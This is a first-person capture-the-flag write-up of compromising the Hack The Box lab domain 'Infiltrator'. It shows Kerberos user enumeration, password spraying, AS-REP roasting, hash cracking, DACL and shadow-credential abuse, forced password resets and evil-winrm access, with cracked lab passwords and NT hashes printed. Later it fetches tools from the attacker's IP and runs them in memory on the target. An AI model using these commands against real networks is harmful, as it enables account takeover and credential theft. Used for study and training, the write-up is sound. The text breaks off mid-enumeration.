Infiltrator
Recon
└─$ grep infil /etc/hosts
10.129.146.214 infiltrator.htb dc01.infiltrator.htb hostmaster.infiltrator.htbDNS
└─$ dig ANY infiltrator.htb @10.10.11.31
; <<>> DiG 9.19.21-1-Debian <<>> ANY infiltrator.htb @10.10.11.31
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1593
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;infiltrator.htb. IN ANY
;; ANSWER SECTION:
infiltrator.htb. 600 IN A 10.10.11.31
infiltrator.htb. 3600 IN NS dc01.infiltrator.htb.
infiltrator.htb. 3600 IN SOA dc01.infiltrator.htb. hostmaster.infiltrator.htb. 417 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.infiltrator.htb. 3600 IN A 10.10.11.31
;; Query time: 84 msec
;; SERVER: 10.10.11.31#53(10.10.11.31) (TCP)
;; WHEN: Sat Aug 31 15:12:42 EDT 2024
;; MSG SIZE rcvd: 142HTTP (80)
Subdomain and directory enumeration came empty handed, the website is most likely just static website hosted on HTML. Search, email and contact wasn't working (most probably).
Kerberos
> document.querySelectorAll('.author-item h4').forEach(e=>console.log(e.textContent))
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda WalkerKerbrute
namebuster was used to generate different combinations of usernames for AD.
└─$ namebuster usernames_web.txt > usernames.txt
└─$ kerbrute userenum ./usernames.txt -d infiltrator.htb --dc dc01.infiltrator.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop
2024/08/31 15:50:56 > Using KDC(s):
2024/08/31 15:50:56 > dc01.infiltrator.htb:88
2024/08/31 15:50:57 > [+] VALID USERNAME: a.walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: a.WALKER@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: a.Walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.Walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.WALKER@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.Harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.HARRIS@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.HARRIS@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.Harris@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.CLARK@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.Clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.Clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.CLARK@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.Anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.ANDERSON@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.Anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.ANDERSON@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.Martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.MARTINEZ@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.Martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.MARTINEZ@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.turner@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.Turner@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.TURNER@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.turner@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.Turner@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.TURNER@infiltrator.htb
2024/08/31 15:51:13 > Done! Tested 1512 usernames (42 valid) in 17.095 seconds
---
a.walker@infiltrator.htb
m.harris@infiltrator.htb
l.clark@infiltrator.htb
e.rodriguez@infiltrator.htb
d.anderson@infiltrator.htb
o.martinez@infiltrator.htb
k.turner@infiltrator.htbAS-REP
Something interesting happens if we try to password spray!
└─$ kerbrute -v passwordspray ./usernames_unique.txt letmein -d infiltrator.htb --dc dc01.infiltrator.htb
Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop
2024/08/31 16:14:04 > Using KDC(s):
2024/08/31 16:14:04 > dc01.infiltrator.htb:88
2024/08/31 16:14:04 > [!] "" - Bad username: blank
2024/08/31 16:14:04 > [!] e.rodriguez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] a.walker@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] k.turner@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] o.martinez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] d.anderson@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] m.harris@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] l.clark@infiltrator.htb:letmein - Got AS-REP (no pre-auth) but couldn't decrypt - bad password
2024/08/31 16:14:04 > Done! Tested 7 logins (0 successes) in 0.310 secondshttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
Get the hashes
└─$ impacket-GetNPUsers infiltrator.htb/ -usersfile usernames_unique.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42ef8903235c8742d9c$e66a1249473ce462b90c7fe5b5da7626eaa5c71ac8983cb9b2ccaea11c818a9ea190fea5561ae3929bd590619512acb45cec1c96fec31650e32a05b1f172be0a91e9abeeff7731494f7f8f4df05e7ccb5e054b7d6701f6bb83fa6e8f7347493e33f8e28d268634795466fc3183f99c4699b1c9c4a504fb688bed125cf5e4cfc7aa4739a543c4b46874ee525301bf92120ceac08b900dd141740946fba507ae5d285499e301ca5b1dea9809aa653bf4ee26bcf0ffd5b11513e709b3070f41cb9c66324eb172eebd37ee56bced6531d3146a0c0d8387b7f42725cbe17804ef8747b7d7d8899bc4e3e9b5ceb869ecdd3b8f8845
...Crack available hash
➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
hashcat (v6.2.6) starting
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42e...ecdd3b8f8845:WAT?watismypass!Creds:
l.clark:WAT?watismypass!
SMB
Perform RID brute just to be safe that we covered all users, evil-winrm didn't work.
└─$ netexec smb 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --shares --rid-brute
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [*] Enumerated shares
SMB 10.10.11.31 445 DC01 Share Permissions Remark
SMB 10.10.11.31 445 DC01 ----- ----------- ------
SMB 10.10.11.31 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.31 445 DC01 C$ Default share
SMB 10.10.11.31 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.31 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.31 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.31 445 DC01 498: INFILTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 500: INFILTRATOR\Administrator (SidTypeUser)
SMB 10.10.11.31 445 DC01 501: INFILTRATOR\Guest (SidTypeUser)
SMB 10.10.11.31 445 DC01 502: INFILTRATOR\krbtgt (SidTypeUser)
SMB 10.10.11.31 445 DC01 512: INFILTRATOR\Domain Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 513: INFILTRATOR\Domain Users (SidTypeGroup)
SMB 10.10.11.31 445 DC01 514: INFILTRATOR\Domain Guests (SidTypeGroup)
SMB 10.10.11.31 445 DC01 515: INFILTRATOR\Domain Computers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 516: INFILTRATOR\Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 517: INFILTRATOR\Cert Publishers (SidTypeAlias)
SMB 10.10.11.31 445 DC01 518: INFILTRATOR\Schema Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 519: INFILTRATOR\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 520: INFILTRATOR\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.31 445 DC01 521: INFILTRATOR\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 522: INFILTRATOR\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 525: INFILTRATOR\Protected Users (SidTypeGroup)
SMB 10.10.11.31 445 DC01 526: INFILTRATOR\Key Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 527: INFILTRATOR\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 553: INFILTRATOR\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.31 445 DC01 571: INFILTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.31 445 DC01 572: INFILTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.31 445 DC01 1000: INFILTRATOR\DC01$ (SidTypeUser)
SMB 10.10.11.31 445 DC01 1101: INFILTRATOR\DnsAdmins (SidTypeAlias)
SMB 10.10.11.31 445 DC01 1102: INFILTRATOR\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1103: INFILTRATOR\D.anderson (SidTypeUser)
SMB 10.10.11.31 445 DC01 1104: INFILTRATOR\L.clark (SidTypeUser)
SMB 10.10.11.31 445 DC01 1105: INFILTRATOR\M.harris (SidTypeUser)
SMB 10.10.11.31 445 DC01 1106: INFILTRATOR\O.martinez (SidTypeUser)
SMB 10.10.11.31 445 DC01 1107: INFILTRATOR\A.walker (SidTypeUser)
SMB 10.10.11.31 445 DC01 1108: INFILTRATOR\K.turner (SidTypeUser)
SMB 10.10.11.31 445 DC01 1109: INFILTRATOR\E.rodriguez (SidTypeUser)
SMB 10.10.11.31 445 DC01 1111: INFILTRATOR\Chiefs Marketing (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1112: INFILTRATOR\Developers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1113: INFILTRATOR\Digital_Influencers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1114: INFILTRATOR\Infiltrator_QA (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1115: INFILTRATOR\Marketing_Team (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1116: INFILTRATOR\Service_Management (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1601: INFILTRATOR\winrm_svc (SidTypeUser)
SMB 10.10.11.31 445 DC01 3102: INFILTRATOR\infiltrator_svc$ (SidTypeUser)LDAP
└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --active-users
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
LDAP 10.10.11.31 389 DC01 [*] Total records returned: 10, total 2 user(s) disabled
LDAP 10.10.11.31 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.31 389 DC01 Administrator 2024-08-21 19:58:28 0 Built-in account for administering the computer/domain
LDAP 10.10.11.31 389 DC01 D.anderson 2023-12-04 18:56:02 4
LDAP 10.10.11.31 389 DC01 L.clark 2023-12-04 19:04:24 0
LDAP 10.10.11.31 389 DC01 M.harris 2024-08-31 20:41:44 4
LDAP 10.10.11.31 389 DC01 O.martinez 2024-02-25 15:41:03 0
LDAP 10.10.11.31 389 DC01 A.walker 2023-12-05 22:06:28 4
LDAP 10.10.11.31 389 DC01 K.turner 2024-02-25 15:40:35 10 MessengerApp@Pass!
LDAP 10.10.11.31 389 DC01 E.rodriguez 2024-08-31 20:41:44 4
LDAP 10.10.11.31 389 DC01 winrm_svc 2024-08-02 22:42:45 4
LDAP 10.10.11.31 389 DC01 lan_managment 2024-08-02 22:42:46 4Creds:
K.turner:MessengerApp@Pass!
For ???, doesn't work for smb!
└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' -M get-desc-users
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
GET-DESC... 10.10.11.31 389 DC01 [+] Found following users:
GET-DESC... 10.10.11.31 389 DC01 User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.31 389 DC01 User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.31 389 DC01 User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.31 389 DC01 User: K.turner description: MessengerApp@Pass!
GET-DESC... 10.10.11.31 389 DC01 User: infiltrator_svc$ description: dc01.infiltrator.htbAlso very useful command:
└─$ ldapdomaindump -u 'infiltrator.htb\l.clark' -p 'WAT?watismypass!' 10.10.11.31
Bloodhound
└─$ bloodhound-python -u 'l.clark@infiltrator.htb' -p 'WAT?watismypass!' -ns 10.10.11.31 -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip
Clark doesn't have anything interesting, but the group he belongs to has another user.
D.anderson.ccache
We are able to forge kerberos tickets and not only ours.
└─$ for username in $(<usernames_rid_brute.txt); do impacket-getTGT "infiltrator.htb/$username:WAT?watismypass\!" -dc-ip 10.10.11.31; done;
...
[*] Saving ticket in D.anderson.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in L.clark.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...└─$ export KRB5CCNAME=./kerberos/ccaches/D.anderson.ccache
└─$ klist
Ticket cache: FILE:./kerberos/ccaches/D.anderson.ccache
Default principal: D.anderson@INFILTRATOR.HTB
Valid starting Expires Service principal
09/01/2024 02:07:17 09/01/2024 06:07:17 krbtgt/INFILTRATOR.HTB@INFILTRATOR.HTB
renew until 09/01/2024 06:07:17
Chain of attack
After following the Outbound permissions on each connection we end up with a chain like:
dacledit
└─$ git clone https://github.com/fortra/impacket.git
└─$ venv
└─$ pip install -r requirements.txt
└─$ pip install -e .
└─$ py examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'l.clark' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' -k -no-pass -dc-ip 10.10.11.31 infiltrator.htb/d.anderson
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240901-032305.bak
[*] DACL modified successfully!Now chain becomes like:
pywhisker && certipy-ad
Same steps from Mist box.
└─$ pywhisker -d infiltrator.htb -u l.clark -p 'WAT?watismypass!' --target 'E.rodriguez' --action add
[*] Searching for the target account
[*] Target user found: CN=E.rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 391786dd-eb48-a551-526b-8f5d55b3bebe
[*] Updating the msDS-KeyCredentialLink attribute of E.rodriguez
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: MR9B48eC.pfx
[*] Must be used with password: gc0BUPDvvbNmvrOaaDur
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ certipy-ad cert -pfx ./MR9B48eC.pfx -password 'gc0BUPDvvbNmvrOaaDur' -export -out rodriguez.pfx -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Loading PFX './MR9B48eC.pfx' with password None
[*] Writing PFX to 'rodriguez.pfx'
└─$ certipy-ad auth -pfx ./rodriguez.pfx -username 'E.rodriguez' -domain infiltrator.htb -dc-ip 10.10.11.31
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: e.rodriguez@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'e.rodriguez.ccache'
[*] Trying to retrieve NT hash for 'e.rodriguez'
[*] Got hash for 'e.rodriguez@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56
└─$ netexec smb 10.10.11.31 -u 'e.rodriguez' -H 'b02e97f2fdb5c3d36f77375383449e56'
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\e.rodriguez:b02e97f2fdb5c3d36f77375383449e56AddSelf
AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals. src
https://www.thehacker.recipes/ad/movement/dacl/addmember
# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
[+] e.rodriguez added to CHIEFS MARKETINGForceChangePassword
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
[+] Password changed successfully!M.harris.ccache
└─$ impacket-getTGT "infiltrator.htb/M.harris:Password123$" -dc-ip 10.129.211.98
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in M.harris.ccache
└─$ export KRB5CCNAME=./kerberos/ccaches/M.harris.ccacheDue to some error in HTB infrastructure the commands had to be executed quickly.....
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
impacket-getTGT "infiltrator.htb/M.harris:Password123$"
mv M.harris.ccache kerberos/ccaches/
export KRB5CCNAME=$(readlink -f ./kerberos/ccaches/M.harris.ccache)
evil-winrm -i dc01.infiltrator.htb -r infiltrator.htbNote: If you get
Cannot find KDC for realm "INFILTRATOR.HTB", you may need to update/etc/resolv.confwith box IP (first entry) or/etc/kerb5.conf
evil-winrm (m.harris)
*Evil-WinRM* PS C:\Users\M.harris> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
| user.txtUser.txt
*Evil-WinRM* PS C:\Users\M.harris> cat Desktop/user.txt
8ac3296d7416bbe06c637e022103d00ePrivilege Escalation
Internal AD Enumeration
└─$ bloodhound-python -u 'm.harris@infiltrator.htb' -k -no-pass -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op harris
Password: # Enter anything, idk why it prompts password with `-no-pass`harris doesn't have any outbound permissions.
evil-winrm was very unstable for some reason, so I switched to ConPtyShell.
PS C:\users> whoami /all
User Name SID
==================== ==============================================
infiltrator\m.harris S-1-5-21-2606098828-3734741516-3625406802-1105
Group Name Type SID Attributes
=========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Protected Users Group S-1-5-21-2606098828-3734741516-3625406802-525 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Developers Group S-1-5-21-2606098828-3734741516-3625406802-1112 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledEnumerate with winPeas
PS C:\users\M.harris\Music> iwr 10.10.14.43/wp.exe -out wp.exe
PS C:\users\M.harris\Music> .\wp.exe | Tee-Object -FilePath wp.log
...
+----------¦ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\M.harris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 192B
...
+----------¦ Drives Information
+ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
E:\ (Type: Fixed)
...
+----------¦ Checking KrbRelayUp
+ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (INFILTRATOR) so it could be vulnerable.
+ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
...
+ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
...
+----------¦ Enumerating machine and user certificate files
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject :
ValidDate : 8/4/2024 11:48:15 AM
ExpiryDate : 7/17/2099 11:48:15 AM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : ABFD279830AC7B08DE25677B654BB7047D01F071
Template : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.8884114.8852024.1722030.16302680.8225111.115.1.33), Major Version Number=110, Minor Version Number=2
Enhanced Key Usages
Client Authentication [*] Certificate is used for client authentication!
Server Authentication
Smart Card Logon
KDC Authentication
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=dc01.infiltrator.htb
ValidDate : 12/7/2023 5:45:12 PM
ExpiryDate : 12/6/2024 5:45:12 PM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 31154FCF64FBACACED5DEC9910EB0D1BB50F1F2C
Template : DomainController
Enhanced Key Usages
Client Authentication [*] Certificate is used for client authentication!
Server Authentication
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
ValidDate : 12/7/2023 5:42:38 PM
ExpiryDate : 12/7/2028 5:52:38 PM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 2C188207AE9DE454750081FACE0CFE730EAFAB65
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
ValidDate : 12/7/2023 5:42:38 PM
ExpiryDate : 8/4/2124 11:55:57 AM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 04A961BA417C7829B307CFBD46B2FB486BFD86C1
=================================================================================================
...
+----------¦ Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\Default
C:\Users\All Users
C:\Users\All Users\ntuser.pol
C:\Users\Default User
C:\Users\Default
...PS C:\users\M.harris\Music> IEX(IWR 10.10.14.43/adPEAS.ps1 -UseBasicParsing)
PS C:\users\M.harris\Music> Invoke-adPEAS
...
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain 'infiltrator.htb':
[!] The Machine Account Quota is currently set to 10
[!] Every member of group 'Authenticated Users' can add a computer to domain 'infiltrator.htb'
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=infiltrator,DC=htb
objectSid: S-1-5-11
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=infiltrator,DC=htb
CN=Certificate Service DCOM Access,CN=Builtin,DC=infiltrator,DC=htb
CN=Users,CN=Builtin,DC=infiltrator,DC=htb
...
[+] Found Active Directory Certificate Services 'infiltrator-DC01-CA':
CA Name: infiltrator-DC01-CA
CA dnshostname: dc01.infiltrator.htb
CA IP Address: 10.129.211.98
Date of Creation: 12/08/2023 01:52:38
DistinguishedName: CN=infiltrator-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
NTAuthCertificates: True
Available Templates: Infiltrator_Template
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
...
[?] +++++ Checking Template 'Infiltrator_Template' +++++
[!] Template 'Infiltrator_Template' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'INFILTRATOR\infiltrator_svc$' has 'CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner' permissions on template 'Infiltrator_Template'
[!] Identity 'Local System' has 'GenericAll' permissions on template 'Infiltrator_Template'
Template Name: Infiltrator_Template
Template distinguishedname: CN=Infiltrator_Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 09/01/2024 20:49:56
[+] Extended Key Usage: Smartcard Logon, Server Authentication, KDC Authentication, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions: Local System : GenericAll
[!] Template Permissions: INFILTRATOR\infiltrator_svc$ : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
...
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServer
Template distinguishedname: CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'INFILTRATOR\Domain Computers' has enrollment rights for template 'Machine'
